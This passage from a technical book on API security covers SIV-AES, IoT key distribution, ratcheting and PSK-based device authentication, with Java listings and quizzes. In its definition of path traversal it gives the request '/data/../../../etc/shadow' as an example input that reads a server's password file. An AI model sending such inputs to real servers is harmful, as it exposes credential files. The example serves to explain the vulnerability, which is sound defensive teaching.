<groupId>org.cryptomator</groupId>
<artifactId>siv-mode</artifactId>
<version>1.3.2</version>
</dependency>
SIV mode requires two separate keys: one for the MAC and one for encryption and
decryption. The specification that defines SIV-AES (https://tools.ietf.org/html/rfc5297)
describes how a single key that is twice as long as normal can be split into two, with the
first half becoming the MAC key and the second half the encryption key. This is
demonstrated in listing 12.16 by splitting the existing 256-bit PSK key into two 128-bit
keys. You could also derive the two keys from a single master key using HKDF, as you
learned in chapter 11. The library used in the listing provides encrypt() and decrypt()
methods that take the encryption key, the MAC key, the plaintext (or ciphertext for
decryption), and then any number of associated data blocks. In this example, you’ll
pass in a header and a random IV. The SIV specification recommends that any ran-
dom IV should be included as the last associated data block.
TIP
The SivMode class from the library is thread-safe and designed to be
reused. If you use this library in production, you should create a single
instance of this class and reuse it for all calls.
var psk = PskServer.loadPsk("changeit".toCharArray());
var macKey = new SecretKeySpec(Arrays.copyOfRange(psk, 0, 16),
"AES");
var encKey = new SecretKeySpec(Arrays.copyOfRange(psk, 16, 32),
"AES");
10
At 4.5MB, Bouncy Castle doesn't qualify as a compact implementation, but it shows how SIV-AES can be eas-
ily implemented on the server.
Listing 12.16
Encrypting data with SIV-AES
Load the key
and split into
separate MAC and
encryption keys.
479
Key distribution and management
var randomIv = new byte[16];
new SecureRandom().nextBytes(randomIv);
var header = "Test header".getBytes();
var body = CBORObject.NewMap()
.Add("sensor", "F5671434")
.Add("reading", 1234).EncodeToBytes();
var siv = new SivMode();
var ciphertext = siv.encrypt(encKey, macKey, body,
header, randomIv);
var plaintext = siv.decrypt(encKey, macKey, ciphertext,
header, randomIv);
12.4
Key distribution and management
In a normal API architecture, the problem of how keys are distributed to clients and
servers is solved using a public key infrastructure (PKI), as you learned in chapter 10.
To recap:
In this architecture, each device has its own private key and associated public key.
The public key is packaged into a certificate that is signed by a certificate author-
ity (CA) and each device has a permanent copy of the public key of the CA.
When a device connects to another device (or receives a connection), it pres-
ents its certificate to identify itself. The device authenticates with the associated
private key to prove that it is the rightful holder of this certificate.
The recipient can verify the identity of the other device by checking that its cer-
tificate is signed by the trusted CA and has not expired, been revoked, or in any
other way become invalid.
This architecture can also be used in IoT environments and is often used for more
capable devices. But constrained devices that lack the capacity for public key cryptog-
raphy are unable to make use of a PKI and so other alternatives must be used, based
Pop quiz
5
Misuse-resistant authenticated encryption (MRAE) modes of operation protect
against which one of the following security failures?
a
Overheating
b
Nonce reuse
c
Weak passwords
d
Side-channel attacks
e
Losing your secret keys
6
True or False: SIV-AES is just as secure even if you repeat a nonce.
The answers are at the end of the chapter.
Generate a random IV
with the best entropy
you have available.
Encrypt the body
passing the header
and random IV as
associated data.
Decrypt by passing
the same associated
data blocks.
480
CHAPTER 12
Securing IoT communications
on symmetric cryptography. Symmetric cryptography is efficient but requires the API
client and server to have access to the same key, which can be a challenge if there are
a large number of devices involved. The key distribution techniques described in the
next few sections aim to solve this problem.
12.4.1 One-off key provisioning
The simplest approach is to provide each device with a key at the time of device
manufacture or at a later stage when a batch of devices is initially acquired by an orga-
nization. One or more keys are generated securely and then permanently stored in
read-only memory (ROM) or EEPROM (electrically erasable programmable ROM)
on the device. The same keys are then encrypted and packaged along with device
identity information and stored in a central directory such as LDAP, where they can be
accessed by API servers to authenticate and decrypt requests from clients or to encrypt
responses to be sent to those devices. The architecture is shown in figure 12.9. A hard-
ware security module (HSM) can be used to securely store the master encryption keys
inside the factory to prevent compromise.
An alternative to generating completely random keys during manufacturing is to
derive device-specific keys from a master key and some device-specific information.
For example, you can use HKDF from chapter 11 to derive a unique device-specific
key based on a unique serial number or ethernet hardware address assigned to each
Factory
Key provisioning
Each device is supplied with a
unique key during manufacturing.
Device
Device
Device
HSM
Device directory
(LDAP)
Device details such as serial number
together with the encrypted key are
stored in a directory. APIs can access
the directory to retrieve device keys.
A hardware security module
(HSM) can be used to securely
store master encryption keys
and generate secure device keys.
Device details +
encrypted key
Figure 12.9
Unique device keys can be generated and installed on a device during
manufacturing. The device keys are then encrypted and stored along with device
details in an LDAP directory or database. APIs can later retrieve the encrypted device
keys and decrypt them to secure communications with that device.
481
Key distribution and management
device. The derived key is stored on the device as before, but the API server can derive
the key for each device without needing to store them all in a database. When the
device connects to the server, it authenticates by sending the unique information
(along with a timestamp or a random challenge to prevent replay), using its device key
to create a MAC. The server can then derive the same device key from the master
key and use this to verify the MAC. For example, Microsoft’s Azure IoT Hub Device
Provisioning Service uses a scheme similar to this for group enrollment of devices
using a symmetric key; for more information, see http://mng.bz/gg4l.
12.4.2 Key distribution servers
Rather than installing a single key once when a device is first acquired, you can
instead periodically distribute keys to devices using a key distribution server. In this
model, the device uses its initial key to enroll with the key distribution server and then
is supplied with a new key that it can use for future communications. The key distribu-
tion server can also make this key available to API servers when they need to commu-
nicate with that device.
LEARN MORE
The E4 product from Teserakt (https://teserakt.io/e4/) includes
a key distribution server that can distribute encrypted keys to devices over the
MQTT messaging protocol. Teserakt has published a series of articles on the
design of its secure IoT architecture, designed by respected cryptographers,
at http://mng.bz/5pKz.
Once the initial enrollment process has completed, the key distribution server can
periodically supply a fresh key to the device, encrypted using the old key. This allows
the device to frequently change its keys without needing to generate them locally,
which is important because constrained devices are often severely limited in access to
sources of entropy.
Remote attestation and trusted execution
Some devices may be equipped with secure hardware that can be used to establish
trust in a device when it is first connected to an organization’s network. For example,
the device might have a Trusted Platform Module (TPM), which is a type of hardware
security module (HSM) made popular by Microsoft. A TPM can prove to a remote
server that it is a particular model of device from a known manufacturer with a par-
ticular serial number, in a process known as remote attestation. Remote attestation
is achieved using a challenge-response protocol based on a private key, known as an
Endorsement Key (EK), that is burned into the device at manufacturing time. The TPM
uses the EK to sign an attestation statement indicating the make and model of the
device and can also provide details on the current state of the device and attached
hardware. Because these measurements of the device state are taken by firmware
running within the secure TPM, they provide strong evidence that the device hasn’t
been tampered with.
482
CHAPTER 12
Securing IoT communications
Rather than writing a dedicated key distribution server, it is also possible to distribute
keys using an existing protocol such as OAuth2. A draft standard for OAuth2 (cur-
rently expired, but periodically revived by the OAuth working group) describes how
to distribute encrypted symmetric keys alongside an OAuth2 access token (http://
mng.bz/6AZy), and RFC 7800 describes how such a key can be encoded into a JSON
Web Token (https://tools.ietf.org/html/rfc7800#section-3.3). The same technique
can be used with CBOR Web Tokens (http://mng.bz/oRaM). These techniques allow
a device to be given a fresh key every time it gets an access token, and any API servers
it communicates with can retrieve the key in a standard way from the access token
itself or through token introspection. Use of OAuth2 in an IoT environment is dis-
cussed further in chapter 13.
12.4.3 Ratcheting for forward secrecy
If your IoT devices are sending confidential data in API requests, using the same
encryption key for the entire lifetime of the device can present a risk. If the device key
is compromised, then an attacker can not only decrypt any future communications
but also all previous messages sent by that device. To prevent this, you need to use
cryptographic mechanisms that provide forward secrecy as discussed in section 12.2.
In that section, we looked at public key mechanisms for achieving forward secrecy, but
you can also achieve this security goal using purely symmetric cryptography through a
technique known as ratcheting.
DEFINITION
Ratcheting in cryptography is a technique for replacing a symmet-
ric key periodically to ensure forward secrecy. The new key is derived from
the old key using a one-way function, known as a ratchet, because it only moves
in one direction. It’s impossible to derive an old key from the new key so pre-
vious conversations are secure even if the new key is compromised.
There are several ways to derive the new key from the old one. For example, you can
derive the new key using HKDF with a fixed context string as in the following example:
var newKey = HKDF.expand(oldKey, "iot-key-ratchet", 32, "HMAC");
(continued)
Although TPM attestation is strong, a TPM is not a cheap component to add to your
IoT devices. Some CPUs include support for a Trusted Execution Environment (TEE),
such as ARM TrustZone, which allows signed software to be run in a special secure
mode of execution, isolated from the normal operating system and other code.
Although less resistant to physical attacks than a TPM, a TEE can be used to imple-
ment security critical functions such as remote attestation. A TEE can also be used
as a poor man’s HSM, providing an additional layer of security over pure software
solutions.
483
Key distribution and management
TIP
It is best practice to use HKDF to derive two (or more) keys: one is used
for HKDF only, to derive the next ratchet key, while the other is used for
encryption or authentication. The ratchet key is sometimes called a chain key
or chaining key.
If the key is not used for HMAC, but instead used for encryption using AES or another
algorithm, then you can reserve a particular nonce or IV value to be used for the
ratchet and derive the new key as the encryption of an all-zero message using that
reserved IV, as shown in listing 12.17 using AES in Counter mode. In this example, a
128-bit IV of all 1-bits is reserved for the ratchet operation because it is highly unlikely
that this value would be generated by either a counter or a randomly generated IV.
WARNING
You should ensure that the special IV used for the ratchet is never
used to encrypt a message.
private static byte[] ratchet(byte[] oldKey) throws Exception {
var cipher = Cipher.getInstance("AES/CTR/NoPadding");
var iv = new byte[16];
Arrays.fill(iv, (byte) 0xFF);
cipher.init(Cipher.ENCRYPT_MODE,
new SecretKeySpec(oldKey, "AES"),
new IvParameterSpec(iv));
return cipher.doFinal(new byte[32]);
}
After performing a ratchet, you should ensure the old key is scrubbed from memory
so that it can’t be recovered, as shown in the following example:
var newKey = ratchet(key);
Arrays.fill(key, (byte) 0);
key = newKey;
TIP
In Java and similar languages, the garbage collector may duplicate the
contents of variables in memory, so copies may remain even if you attempt to
wipe the data. You can use ByteBuffer.allocateDirect() to create off-heap
memory that is not managed by the garbage collector.
Ratcheting only works if both the client and the server can determine when a ratchet
occurs; otherwise, they will end up using different keys. You should therefore perform
ratchet operations at well-defined moments. For example, each device might ratchet
its key at midnight every day, or every hour, or perhaps even after every 10 messages.11
Listing 12.17
Ratcheting with AES-CTR
11
The Signal secure messaging service is famous for its “double ratchet” algorithm (https://signal.org/docs/
specifications/doubleratchet/), which ensures that a fresh key is derived after every single message.
Reserve a
fixed IV that is
used only for
ratcheting.
Initialize the cipher
using the old key and
the fixed ratchet IV.
Encrypt 32 zero bytes and use
the output as the new key.
Overwrite the old
key with zero bytes.
Replace the old key
with the new key.
484
CHAPTER 12
Securing IoT communications
The rate at which ratchets should be performed depends on the number of requests
that the device sends, and the sensitivity of the data being transmitted.
Ratcheting after a fixed number of messages can help to detect compromise: if an
attacker is using a device’s stolen secret key, then the API server will receive extra mes-
sages in addition to any the device sent and so will perform the ratchet earlier than
the legitimate device. If the device discovers that the server is performing ratcheting
earlier than expected, then this is evidence that another party has compromised the
device secret key.
12.4.4 Post-compromise security
Although forward secrecy protects old communications if a device is later compro-
mised, it says nothing about the security of future communications. There have been
many stories in the press in recent years of IoT devices being compromised, so being
able to recover security after a compromise is a useful security goal, known as post-
compromise security.
DEFINITION
Post-compromise security (or future secrecy) is achieved if a device can
ensure security of future communications after a device has been compro-
mised. It should not be confused with forward secrecy which protects confiden-
tiality of past communications.
Post-compromise security assumes that the compromise is not permanent, and in
most cases it’s not possible to retain security in the presence of a persistent compro-
mise. However, in some cases it may be possible to re-establish security once the com-
promise has ended. For example, a path traversal vulnerability might allow a remote
attacker to view the contents of files on a device, but not modify them. Once the vul-
nerability is found and patched, the attacker’s access is removed.
DEFINITION
A path traversal vulnerability occurs when a web server allows an
attacker to access files that were not intended to be made available by
manipulating the URL path in requests. For example, if the web server pub-
lishes data under a /data folder, an attacker might send a request for
/data/../../../etc/shadow.12 If the webserver doesn’t carefully check paths,
then it may serve up the local password file.
If the attacker manages to steal the long-term secret key used by the device, then it can
be impossible to regain security without human involvement. In the worst case, the
device may need to be replaced or restored to factory settings and reconfigured. The
ratcheting mechanisms discussed in section 12.4.3 do not protect against compro-
mise, because if the attacker ever gains access to the current ratchet key, they can eas-
ily calculate all future keys.
12
Real path-traversal exploits are usually more complex than this, relying on subtle bugs in URL parsing routines.
485
Key distribution and management
Hardware security measures, such as a secure element, TPM, or TEE (see sec-
tion 12.4.1) can provide post-compromise security by ensuring that an attacker never
directly gains access to the secret key. An attacker that has active control of the device
can use the hardware to compromise communications while they have access, but
once that access is removed, they will no longer be able to decrypt or interfere with
future communications.
A weaker form of post-compromise security can be achieved if an external source
of key material is mixed into a ratcheting process periodically. If the client and server
can agree on such key material without the attacker learning it, then any new derived
keys will be unpredictable to the attacker and security will be restored. This is weaker
than using secure hardware, because if the attacker has stolen the device’s key, then,
in principle, they can eavesdrop or interfere with all future communications and inter-
cept or control this key material. However, if even a single communication exchange
can occur without the attacker interfering, then security can be restored.
There are two main methods to exchange key material between the server and
the client:
They can directly exchange new random values encrypted using the old key.
For example, a key distribution server might periodically send the client a
new key encrypted with the old one, as described in section 12.4.2, or both
parties might send random nonces that are mixed into the key derivation pro-
cess used in ratcheting (section 12.4.3). This is the weakest approach because
a passive attacker who is able to eavesdrop can use the random values directly
to derive the new keys.
They can use Diffie-Hellman key agreement with fresh random (ephemeral) keys to
derive new key material. Diffie-Hellman is a public key algorithm in which the
client and server only exchange public keys but use local private keys to derive a
shared secret. Diffie-Hellman is secure against passive eavesdroppers, but an
attacker who is able to impersonate the device with a stolen secret key may still
be able to perform an active man-in-the-middle attack to compromise security. IoT
devices deployed in accessible locations may be particularly vulnerable to man-
in-the-middle attacks because an attacker could have physical access to network
connections.
DEFINITION
A man-in-the-middle (MitM) attack occurs when an attacker actively
interferes with communications and impersonates one or both parties. Proto-
cols such as TLS contain protections against MitM attacks, but they can still
occur if long-term secret keys used for authentication are compromised.
Post-compromise security is a difficult goal to achieve and most solutions come with
costs in terms of hardware requirements or more complex cryptography. In many IoT
applications, the budget would be better spent trying to avoid compromise in the first
place, but for particularly sensitive devices or data, you may want to consider adding a
secure element or other hardware security mechanism to your devices.
486
CHAPTER 12
Securing IoT communications
Answers to pop quiz questions
1
b. NEED_WRAP indicates that the SSLEngine needs to send data to the other
party during the handshake.
2
b. AES-GCM fails catastrophically if a nonce is reused, and this is more likely in
IoT applications.
3
False. Fresh keys are derived for each session by exchanging random values
during the handshake.
4
d. Diffie-Hellman key agreement with fresh ephemeral key pairs is used to
ensure forward secrecy.
5
b. MRAE modes are more robust in the case of nonce reuse.
6
False. SIV-AES is less secure if a nonce is reused but loses a relatively small amount
of security compared to other modes. You should still aim to use unique nonces
for every message.
7
False. Ratcheting achieves forward secrecy but not post-compromise security.
Once an attacker has compromised the ratchet key, they can derive all future keys.
Summary
IoT devices may be constrained in CPU power, memory, storage or network
capacity, or battery life. Standard API security practices, based on web protocols
and technologies, are poorly suited to such environments and more efficient
alternatives should be used.
UDP-based network protocols can be protected using Datagram TLS. Alterna-
tive cipher suites can be used that are better suited to constrained devices, such
as those using AES-CCM or ChaCha20-Poly1305.
X.509 certificates are complex to verify and require additional signature valida-
tion and parsing code, increasing the cost of supporting secure communications.
Pre-shared keys can eliminate this overhead and use more efficient symmetric
cryptography. More capable devices can combine PSK cipher suites with ephem-
eral Diffie-Hellman to achieve forward secrecy.
IoT communications often need to traverse multiple network hops employing
different transport protocols. End-to-end encryption and authentication can be
used to ensure that confidentiality and integrity of API requests and responses
are not compromised if an intermediate host is attacked. The COSE standards
provide similar capabilities to JOSE with better suitability for IoT devices, but
alternatives such as NaCl can be simpler and more secure.
Pop quiz
7
True or False: Ratcheting can provide post-compromise security.
The answer is at the end of the chapter.
487
Summary
Constrained devices often lack access to good sources of entropy to generate ran-
dom nonces, increasing the risk of nonce reuse vulnerabilities. Misuse-resistant
authentication encryption modes, such as SIV-AES, are a much safer choice for
such devices and offer similar benefits to AES-CCM for code size.
Key distribution is a complex problem for IoT environments, which can be
solved through simple key management techniques such as the use of key dis-
tribution servers. Large numbers of device keys can be managed through key
derivation, and ratcheting can be used to ensure forward secrecy. Hardware
security features provide additional protection against compromised devices.
488
Securing IoT APIs
In chapter 12, you learned how to secure communications between devices using
Datagram TLS (DTLS) and end-to-end security. In this chapter, you’ll learn how to
secure access to APIs in Internet of Things (IoT) environments, including APIs
provided by the devices themselves and cloud APIs the devices connect to. In its
rise to become the dominant API security technology, OAuth2 is also popular for
IoT applications, so you’ll learn about recent adaptations of OAuth2 for con-
strained devices in section 13.3. Finally, we’ll look at how to manage access control
decisions when a device may be disconnected from other services for prolonged
periods of time in section 13.4.
This chapter covers
Authenticating devices to APIs
Avoiding replay attacks in end-to-end device
authentication
Authorizing things with the OAuth2 device grant
Performing local access control when a device
is offline
489
Authenticating devices
13.1
Authenticating devices
In consumer IoT applications, devices are often acting under the control of a user, but
industrial IoT devices are typically designed to act autonomously without manual user
intervention. For example, a system monitoring supply levels in a warehouse would be
configured to automatically order new stock when levels of critical supplies become
low. In these cases, IoT devices act under their own authority much like the service-to-
service API calls in chapter 11. In chapter 12, you saw how to provision credentials to
devices to secure IoT communications, and in this section, you’ll see how to use those
to authenticate devices to access APIs.
13.1.1 Identifying devices
To be able to identify clients and make access control decisions about them in your
API, you need to keep track of legitimate device identifiers and other attributes of the
devices and link those to the credentials that device uses to authenticate. This allows
you to look up these device attributes after authentication and use them to make
access control decisions. The process is very similar to authentication for users, and
you could reuse an existing user repository such as LDAP to also store device profiles,
although it is usually safer to separate users from device accounts to avoid confusion.
Where a user profile typically includes a hashed password and details such as their
name and address, a device profile might instead include a pre-shared key for that
device, along with manufacturer and model information, and the location of where
that device is deployed.
The device profile can be generated at the point the device is manufactured, as
shown in figure 13.1. Alternatively, the profile can be built when devices are first deliv-
ered to an organization, in a process known as onboarding.
Factory
Device provisioning
Unique device identifiers and
credentials are deployed to the
device during manufacturing or
onboarding.
Device
Device
Device
Device directory
(LDAP)
Device details and identifiers are
combined into a device profile and
stored in a central repository.
Device details +
encrypted PSK
Figure 13.1
Device details and unique identifiers are stored in a shared
repository where they can be accessed later.
490
CHAPTER 13
Securing IoT APIs
DEFINITION
Device onboarding is the process of deploying a device and register-
ing it with the services and networks it needs to access.
Listing 13.1 shows code for a simple device profile with an identifier, basic model
information, and an encrypted pre-shared key (PSK) that can be used to communi-
cate with the device using the techniques in chapter 12. The PSK will be encrypted
using the NaCl SecretBox class that you used in chapter 6, so you can add a method
to decrypt the PSK with a secret key. Navigate to src/main/java/com/manning/
apisecurityinaction and create a new file named Device.java and copy in the contents
of the listing.
package com.manning.apisecurityinaction;
import org.dalesbred.Database;
import org.dalesbred.annotation.DalesbredInstantiator;
import org.h2.jdbcx.JdbcConnectionPool;
import software.pando.crypto.nacl.SecretBox;
import java.io.*;
import java.security.Key;
import java.util.Optional;
public class Device {
final String deviceId;
final String manufacturer;
final String model;
final byte[] encryptedPsk;
@DalesbredInstantiator
public Device(String deviceId, String manufacturer,
String model, byte[] encryptedPsk) {
this.deviceId = deviceId;
this.manufacturer = manufacturer;
this.model = model;
this.encryptedPsk = encryptedPsk;
}
public byte[] getPsk(Key decryptionKey) {
try (var in = new ByteArrayInputStream(encryptedPsk)) {
var box = SecretBox.readFrom(in);
return box.decrypt(decryptionKey);
} catch (IOException e) {
throw new RuntimeException("Unable to decrypt PSK", e);
}
}
}
You can now populate the database with device profiles. Listing 13.2 shows how to ini-
tialize the database with an example device profile and encrypted PSK. Just like previ-
ous chapters you can use a temporary in-memory H2 database to hold the device
Listing 13.1
A device profile
Create fields
for the device
attributes.
Annotate the constructor
so that Dalesbred knows
how to load a device from
the database.
Add a
method to
decrypt the
device PSK
using NaCl’s
SecretBox.
491
Authenticating devices
details, because this makes it easy to test. In a production deployment you would use a
database server or LDAP directory. You can load the database into the Dalesbred
library that you’ve used since chapter 2 to simplify queries. Then you should create
the table to hold the device profiles, in this case with simple string attributes (VARCHAR
in SQL) and a binary attribute to hold the encrypted PSK. You could extract these
SQL statements into a separate schema.sql file as you did in chapter 2, but because
there is only a single table, I’ve used string literals instead. Open the Device.java file
again and add the new method from the listing to create the example device database.
static Database createDatabase(SecretBox encryptedPsk) throws IOException {
var pool = JdbcConnectionPool.create("jdbc:h2:mem:devices",
"devices", "password");
var database = Database.forDataSource(pool);
database.update("CREATE TABLE devices(" +
"device_id VARCHAR(30) PRIMARY KEY," +
"manufacturer VARCHAR(100) NOT NULL," +
"model VARCHAR(100) NOT NULL," +
"encrypted_psk VARBINARY(1024) NOT NULL)");
var out = new ByteArrayOutputStream();
encryptedPsk.writeTo(out);
database.update("INSERT INTO devices(" +
"device_id, manufacturer, model, encrypted_psk) " +
"VALUES(?, ?, ?, ?)", "test", "example", "ex001",
out.toByteArray());
return database;
}
You’ll also need a way to find a device by its device ID or other attributes. Dalesbred
makes this quite simple, as shown in listing 13.3. The findOptional method can be
used to search for a device; it will return an empty result if there is no matching
device. You should select the fields of the device table in exactly the order they appear
in the Device class constructor in listing 13.1. As described in chapter 2, use a bind
parameter in the query to supply the device ID, to avoid SQL injection attacks.
static Optional<Device> find(Database database, String deviceId) {
return database.findOptional(Device.class,
"SELECT device_id, manufacturer, model, encrypted_psk " +
"FROM devices WHERE device_id = ?", deviceId);
}
Listing 13.2
Populating the device database
Listing 13.3
Finding a device by ID
Create and
load the
in-memory
device
database.
Create a table
to hold device
details and
encrypted PSKs.
Serialize
the example
encrypted
PSK to a
byte array.
Insert an
example
device into
the database.
Use the findOptional method with
your Device class to load devices.
Select device attributes in the same
order they appear in the constructor.
Use a bind parameter to query for a
device with the matching device_id.
492
CHAPTER 13
Securing IoT APIs
Now that you have some device details, you can use them to authenticate devices
and perform access control based on those device identities, which you’ll do in sec-
tions 13.1.2 and 13.1.3.
13.1.2 Device certificates
An alternative to storing device details directly in a database is to instead provide each
device with a certificate containing the same details, signed by a trusted certificate
authority. Although traditionally certificates are used with public key cryptography,
you can use the same techniques for constrained devices that must use symmetric
cryptography instead. For example, the device can be issued with a signed JSON Web
Token that contains device details and an encrypted PSK that the API server can
decrypt, as shown in listing 13.4. The device treats the certificate as an opaque token
and simply presents it to APIs that it needs to access. The API trusts the JWT because it
is signed by a trusted issuer, and it can then decrypt the PSK to authenticate and com-
municate with the device.
{
"iss":"https://example.com/devices",
"iat":1590139506,
"exp":1905672306,
"sub":"ada37d7b-e895-4d55-9571-4df602e60c27",
"psk":" jZvara1OnqqBZrz1HtvHBCNjXvCJptEuIAAAAJInAtaLFnYna9K0WxX4_
➥ IGPyztb8VUwo0CI_UmqDQgm"
}
This can be more scalable than a database if you have many devices, but makes it
harder to update incorrect details or change keys. A middle ground is provided by the
attestation techniques discussed in chapter 12, in which an initial certificate and key
are used to prove the make and model of a device when it first registers on a network,
and it then negotiates a device-specific key to use from then on.
13.1.3 Authenticating at the transport layer
If there is a direct connection between a device and the API it’s accessing, then you can
use authentication mechanisms provided by the transport layer security protocol. For
example, the pre-shared key (PSK) cipher suites for TLS described in chapter 12 pro-
vide mutual authentication of both the client and the server. Client certificate authenti-
cation can be used by more capable devices just as you did in chapter 11 for service
clients. In this section, we’ll look at identifying devices using PSK authentication.
During the handshake, the client provides a PSK identity to the server in the Client-
KeyExchange message. The API can use this PSK ID to locate the correct PSK for that
client. The server can look up the device profile for that device using the PSK ID at
the same time that it loads the PSK, as shown in figure 13.2. Once the handshake
Listing 13.4
Encrypted PSK in a JWT claims set
Include the usual JWT
claims identifying the
device.
Add an encrypted PSK that can be
used to communicate with the device.
493
Authenticating devices
has completed, the API is assured of the device identity by the mutual authentication
that PSK cipher suites achieve.
In this section, you’ll adjust the PskServer from chapter 12 to look up the device
profile during authentication. First, you need to load and initialize the device data-
base. Open the PskServer.java file and add the following lines at the start of the main()
method just after the PSK is loaded:
var psk = loadPsk(args[0].toCharArray());
var encryptionKey = SecretBox.key();
var deviceDb = Device.createDatabase(
SecretBox.encrypt(encryptionKey, psk));
The client will present its device identifier as the PSK identity field during the hand-
shake, which you can then use to find the associated device profile and encrypted PSK
to use to authenticate the session. Listing 13.5 shows a new DeviceIdentityManager
class that you can use with Bouncy Castle instead of the existing PSK identity manager.
The new identity manager performs a lookup in the device database to find a device
that matches the PSK identity supplied by the client. If a matching device is found,
then you can decrypt the associated PSK from the device profile and use that to
authenticate the TLS connection. Otherwise, return null to abort the connection.
The client doesn’t need any hint to determine its own identity, so you can also return
Device
API
Device DB
PSK ID
Lookup device profile
Device profile with
encrypted PSK
Decrypt PSK
TLS handshake with PSK
The device supplies an
identifier for the preshared
key at the start of
the handshake.
The API looks up the
device profile and
encrypted PSK in the
device database.
The API decrypts the PSK
and then continues the
handshake with that key.
Figure 13.2
When the device connects to the API, it sends a PSK identifier in the TLS
ClientKeyExchange message. The API can use this to find a matching device profile with
an encrypted PSK for that device. The API decrypts the PSK and then completes the TLS
handshake using the PSK to authenticate the device.
The existing line to load
the example PSK
Create a new PSK
encryption key.
Initialize the database
with the encrypted PSK.
494
CHAPTER 13
Securing IoT APIs
null from the getHint() method to disable the ServerKeyExchange message in the
handshake just as you did in chapter 12. Create a new file named DeviceIdentity-
Manager.java in the same folder as the Device.java file you created earlier and add the
contents of the listing.
package com.manning.apisecurityinaction;
import org.bouncycastle.tls.TlsPSKIdentityManager;
import org.dalesbred.Database;
import java.security.Key;
import static java.nio.charset.StandardCharsets.UTF_8;
public class DeviceIdentityManager implements TlsPSKIdentityManager {
private final Database database;
private final Key pskDecryptionKey;
public DeviceIdentityManager(Database database, Key pskDecryptionKey) {
this.database = database;
this.pskDecryptionKey = pskDecryptionKey;
}
@Override
public byte[] getHint() {
return null;
}
@Override
public byte[] getPSK(byte[] identity) {
var deviceId = new String(identity, UTF_8);
return Device.find(database, deviceId)
.map(device -> device.getPsk(pskDecryptionKey))
.orElse(null);
}
}
To use the new device identity manager, you need to update the PskServer class again.
Open PskServer.java in your editor and change the lines of code that create the PSK-
TlsServer object to use the new class. I’ve highlighted the new code in bold:
var crypto = new BcTlsCrypto(new SecureRandom());
var server = new PSKTlsServer(crypto,
new DeviceIdentityManager(deviceDb, encryptionKey)) {
You can delete the old getIdentityManager() method too because it is unused now.
You also need to adjust the PskClient implementation to send the correct device ID
during the handshake. If you recall from chapter 12, we used an SHA-512 hash of the
PSK as the ID there, but the device database uses the ID "test" instead. Open Psk-
Client.java and change the pskId variable at the top of the main() method to use the
UTF-8 bytes of the correct device ID:
var pskId = "test".getBytes(UTF_8);
Listing 13.5
The device IdentityManager
Initialize
the identity
manager with
the device
database and
PSK decryption
key.
Return a null identity hint to
disable the ServerKeyExchange
message.
Convert the PSK
identity hint into a
UTF-8 string to use as
the device identity.
If the device exists,
then decrypt the
associated PSK.
Otherwise, return null to
abort the connection.
495
Authenticating devices
If you now run the PskServer and then the PskClient it will still work correctly, but
now it is using the encrypted PSK loaded from the device database.
EXPOSING THE DEVICE IDENTITY TO THE API
Although you are now authenticating the device based on a PSK attached to its device
profile, that device profile is not exposed to the API after the handshake completes.
Bouncy Castle doesn’t provide a public method to get the PSK identity associated with
a connection, but it is easy to expose this yourself by adding a new method to the PSK-
TlsServer, as shown in listing 13.6. A protected variable inside the server contains the
TlsContext class, which has information about the connection (the server supports
only a single client at a time). The PSK identity is stored inside the SecurityParameters
class for the connection. Open the PskServer.java file and add the new method high-
lighted in bold in the listing. You can then retrieve the device identity after receiving a
message by calling:
var deviceId = server.getPeerDeviceIdentity();
CAUTION
You should only trust the PSK identity returned from getSecurity-
ParametersConnection(), which are the final parameters after the handshake
completes. The similarly named getSecurityParametersHandshake() contains
parameters negotiated during the handshake process before authentication
has finished and may be incorrect.
var server = new PSKTlsServer(crypto,
new DeviceIdentityManager(deviceDb, encryptionKey)) {
@Override
protected ProtocolVersion[] getSupportedVersions() {
return ProtocolVersion.DTLSv12.only();
}
@Override
protected int[] getSupportedCipherSuites() {
return new int[] {
CipherSuite.TLS_PSK_WITH_AES_128_CCM,
CipherSuite.TLS_PSK_WITH_AES_128_CCM_8,
CipherSuite.TLS_PSK_WITH_AES_256_CCM,
CipherSuite.TLS_PSK_WITH_AES_256_CCM_8,
CipherSuite.TLS_PSK_WITH_AES_128_GCM_SHA256,
CipherSuite.TLS_PSK_WITH_AES_256_GCM_SHA384,
CipherSuite.TLS_PSK_WITH_CHACHA20_POLY1305_SHA256
};
}
String getPeerDeviceIdentity() {
return new String(context.getSecurityParametersConnection()
.getPSKIdentity(), UTF_8);
}
};
Listing 13.6
Exposing the device identity
Add a new method to the
PSKTlsServer to expose
the client identity.
Look up the PSK
identity and decode
it as a UTF-8 string.
496
CHAPTER 13
Securing IoT APIs
The API server can then use this device identity to look up permissions for this device,
using the same identity-based access control techniques used for users in chapter 8.
13.2
End-to-end authentication
If the connection from the device to the API must pass through different protocols, as
described in chapter 12, authenticating devices at the transport layer is not an option.
In chapter 12, you learned how to secure end-to-end API requests and responses using
authenticated encryption with Concise Binary Object Representation (CBOR) Object
Signing and Encryption (COSE) or NaCl’s CryptoBox. These encrypted message for-
mats ensure that requests cannot be tampered with, and the API server can be sure
that the request originated from the device it claims to be from. By adding a device
identifier to the message as associated data.1 which you’ll recall from chapter 6 is
authenticated but not encrypted, the API can look up the device profile to find the
key to decrypt and authenticate messages from that device.
Unfortunately, this is not enough to ensure that API requests really did come from
that device, so it is dangerous to make access control decisions based solely on the
Message Authentication Code (MAC) used to authenticate the message. The reason is
that API requests can be captured by an attacker and later replayed to perform the
same action again at a later time, known as a replay attack. For example, suppose you
are the leader of a clandestine evil organization intent on world domination. A moni-
toring device in your uranium enrichment plant sends an API request to increase the
speed of a centrifuge. Unfortunately, the request is intercepted by a secret agent, who
then replays the request hundreds of times, and the centrifuge spins too quickly, caus-
ing irreparable damage and delaying your dastardly plans by several years.
DEFINITION
In a replay attack, an attacker captures genuine API requests and
later replays them to cause actions that weren’t intended by the original client.
Replay attacks can cause disruption even if the message itself is authenticated.
Pop quiz
1
True or False: A PSK ID is always a UTF-8 string.
2
Why should you only trust the PSK ID after the handshake completes?
a
Before the handshake completes, the ID is encrypted.
b
You should never trust anyone until you’ve shaken their hand.
c
The ID changes after the handshake to avoid session fixation attacks.
d
Before the handshake completes, the ID is unauthenticated so it could be fake.
The answers are at the end of the chapter.
1 One of the few drawbacks of the NaCl CryptoBox and SecretBox APIs is that they don’t allow authenticated
associated data.
497
End-to-end authentication
To prevent replay attacks, the API needs to ensure that a request came from a legiti-
mate client and is fresh. Freshness ensures that the message is recent and hasn’t been
replayed and is critical to security when making access control decisions based on the
identity of the client. The process of identifying who an API server is talking to is
known as entity authentication.
DEFINITION
Entity authentication is the process of identifying who requested an
API operation to be performed. Although message authentication can confirm
who originally authored a request, entity authentication additionally requires
